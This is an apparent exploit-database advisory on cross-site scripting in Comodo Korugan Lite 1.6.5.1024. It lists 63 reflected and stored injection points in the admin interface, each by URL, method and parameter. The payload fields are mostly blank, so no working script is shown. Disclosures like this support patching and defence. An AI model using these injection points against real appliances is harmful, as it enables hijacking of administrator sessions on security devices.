################################################################################################################################## # Exploit Title: Comodo KORUGAN LITE 1.6.5.1024 | Cross-Site Scripting # Date: 18.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.korugan.com/koruganlite.php # Software Link: https://download.comodo.com/korugan/Korugan-Lite.ova # Version: 1.6.5.1024 ################################################################################################################################## Introduction Korugan Unified Threat Management and Comodo Security Appliances are here to offer you the best breed of security! Free UTM for your office! Just download and run it for free enterprise grade security! ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:10443/korugan/login METHOD Post PARAMETER username PAYLOAD "> ################################################################################# XSS2 | Stored URL https://192.168.2.200:10443/korugan/admin_profiles METHOD Post PARAMETER profile_name PAYLOAD ################################################################################# XSS3 | Stored URL https://192.168.2.200:10443/korugan/admin_profiles METHOD Post PARAMETER comment PAYLOAD ################################################################################# XSS4 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER admin_name PAYLOAD ################################################################################# XSS5 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER name PAYLOAD ################################################################################# XSS6 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER surname PAYLOAD ################################################################################# XSS7 | Stored URL https://192.168.2.200:10443/korugan/license_activation METHOD Post PARAMETER newLicense PAYLOAD ################################################################################# XSS8 | Reflected URL https://192.168.2.200:10443/korugan/backupschedule METHOD Post PARAMETER BACKUP_RCPTTO PAYLOAD ################################################################################# XSS9 | Reflected URL https://192.168.2.200:10443/korugan/netwizard2 METHOD Post PARAMETER ip_addr PAYLOAD ################################################################################# XSS10 | Reflected URL https://192.168.2.200:10443/korugan/netwizard2 METHOD Post PARAMETER netmask_addr PAYLOAD ################################################################################# XSS11 | Reflected URL https://192.168.2.200:10443/korugan/routing#createrule METHOD Post PARAMETER destination PAYLOAD ################################################################################# XSS12 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER source PAYLOAD ################################################################################# XSS13 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER destination PAYLOAD ################################################################################# XSS14 | Reflected URL https://192.168.2.200:10443/korugan/dhcp METHOD Post PARAMETER GATEWAY_GREEN PAYLOAD ################################################################################# XSS15 | Reflected URL https://192.168.2.200:10443/korugan/time METHOD Post PARAMETER NTP_SERVER_LIST PAYLOAD ################################################################################# XSS16 | Reflected URL https://192.168.2.200:10443/korugan/hotspot_permanent_users METHOD Post PARAMETER MACADDRESSES PAYLOAD ################################################################################# XSS17 | Reflected URL https://192.168.2.200:10443/manage/qos/devices/ METHOD Post PARAMETER device PAYLOAD ################################################################################# XSS18 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER protocol PAYLOAD ################################################################################# XSS19 | Reflected URL https://192.168.2.200:10443/korugan/fwgroups METHOD Post PARAMETER FWADDRESSES PAYLOAD ################################################################################# XSS20 | Stored URL https://192.168.2.200:10443/korugan/schedule METHOD Post PARAMETER SCHNAME PAYLOAD ################################################################################# XSS21 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER port PAYLOAD ################################################################################# XSS22 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER snat_to_ip PAYLOAD ################################################################################# XSS23 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER mac PAYLOAD ################################################################################# XSS24 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER target PAYLOAD ################################################################################# XSS25 | Stored URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER remark PAYLOAD ################################################################################# XSS26 | Stored URL https://192.168.2.200:10443/korugan/vpnfw METHOD Post PARAMETER remark PAYLOAD ################################################################################# XSS27 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER PROXY_PORT PAYLOAD ################################################################################# XSS28 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER VISIBLE_HOSTNAME PAYLOAD ################################################################################# XSS29 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER ADMIN_MAIL_ADDRESS PAYLOAD ################################################################################# XSS30 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER CACHE_MEM PAYLOAD ################################################################################# XSS31 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MAX_SIZE PAYLOAD ################################################################################# XSS32 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MIN_SIZE PAYLOAD ################################################################################# XSS33 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER DST_NOCACHE PAYLOAD ################################################################################# XSS34 | Reflected URL https://192.168.2.200:10443/korugan/https_exceptions METHOD Post PARAMETER EXCEPTIONSITELIST PAYLOAD ################################################################################# XSS35 | Reflected URL https://192.168.2.200:10443/korugan/frox METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD ################################################################################# XSS36 | Reflected URL https://192.168.2.200:10443/korugan/frox METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD ################################################################################# XSS37 | Reflected URL https://192.168.2.200:10443/korugan/smtpconfig METHOD Post PARAMETER VIRUS_ADMIN PAYLOAD ################################################################################# XSS38 | Reflected URL https://192.168.2.200:10443/korugan/smtpconfig METHOD Post PARAMETER BYPASS_SOURCE PAYLOAD ################################################################################# XSS39 | Reflected URL https://192.168.2.200:10443/korugan/smtpconfig METHOD Post PARAMETER BYPASS_DESTINATION PAYLOAD ################################################################################# XSS40 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER SENDER_WHITELIST PAYLOAD ################################################################################# XSS41 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER RECIPIENT_WHITELIST PAYLOAD ################################################################################# XSS42 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER CLIENT_WHITELIST PAYLOAD ################################################################################# XSS43 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER SENDER_BLACKLIST PAYLOAD ################################################################################# XSS44 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER RECIPIENT_BLACKLIST PAYLOAD ################################################################################# XSS45 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER CLIENT_BLACKLIST PAYLOAD ################################################################################# XSS46 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER WHITELIST_RECIPIENT PAYLOAD ################################################################################# XSS47 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER WHITELIST_CLIENT PAYLOAD ################################################################################# XSS48 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER SPAM_WHITELIST PAYLOAD ################################################################################# XSS49 | Reflected URL https://192.168.2.200:10443/korugan/smtplists METHOD Post PARAMETER SPAM_BLACKLIST PAYLOAD ################################################################################# XSS50 | Reflected URL https://192.168.2.200:10443/korugan/smtpadvanced METHOD Post PARAMETER ALWAYS_BCC_ADDRESS PAYLOAD ################################################################################# XSS51 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD ################################################################################# XSS52 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD ################################################################################# XSS53 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_WHITELIST PAYLOAD ################################################################################# XSS54 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_BLACKLIST PAYLOAD ################################################################################# XSS55 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER username PAYLOAD ################################################################################# XSS56 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER remotenets PAYLOAD ################################################################################# XSS57 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER explicitroutes PAYLOAD ################################################################################# XSS58 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER static_ip PAYLOAD ################################################################################# XSS59 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_dns PAYLOAD ################################################################################# XSS60 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_domain PAYLOAD ################################################################################# XSS61 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_NETWORKS PAYLOAD ################################################################################# XSS62 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_DNS PAYLOAD ################################################################################# XSS63 | Reflected URL https://192.168.2.200:10443/korugan/vpn_users METHOD Post PARAMETER username PAYLOAD #################################################################################